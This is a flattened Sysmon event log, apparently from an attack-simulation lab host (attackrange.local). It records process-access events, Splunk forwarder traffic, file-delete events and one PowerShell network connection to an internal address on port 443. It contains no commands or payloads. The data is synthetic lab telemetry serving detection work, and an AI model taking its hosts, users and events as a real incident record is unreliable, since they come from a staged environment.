22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035129703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:04:08.355{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62317-false10.0.1.12-8000- 23542300x800000000000000035129702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:43.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B27C3A979AAB9D4FF1F3112EDD0DA6A,SHA256=C8B18AC93BB09E40257ABB8EC49623D7EF93F1D3615964F70591CDCEE1AF8E62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:44.201{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B41616159C733ED322DD26E87CC5156,SHA256=B3CE0E5850A87FE6E213D7BC8E67CA5AC29CE80B1FFA241BBF2D3ADB8230347C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:45.881{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8D104440199F0FEF3D8DE822076FA2FE,SHA256=099C42C3B9400630CDE790F20C166A75684C530F302A6689626EB6EF4CCA384B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:45.204{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6469BEFE5856A675BA3C96EEDDF9F218,SHA256=2FCDFBA5AEC305C87E53A526C0C9939D625C120BFF0656064195A1CB128670F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:04:11.038{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62318-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:46.218{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3A432BA9CDC0341AE5F8FBB677994AE,SHA256=C948A3BC417B2933329B0499EEC66317C63E5B1CBF19C0A7248FC95563867C7F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:47.264{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B30226F248E9FB5BDF1FDDF8A318A417,SHA256=5BAF21ED1D60508BB02C84AEA79900427F5C61EB7B3BCB780BCCD3D9B385CD24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:04:13.366{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62319-false10.0.1.12-8000- 23542300x800000000000000035129710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:48.278{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAA1E84DE4D598738DCB530331A95739,SHA256=B15835266775A90563507872EB8BAA5BA957E133627DACE8FCE9C0C29FAE6E3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:49.331{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E590400BCA9BEF92558D3964015FAB80,SHA256=82B952C61EFAA199AF8FFDC35CEB2C5392DF5DA4D7E7D0F6C34B42CB03EA4F58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space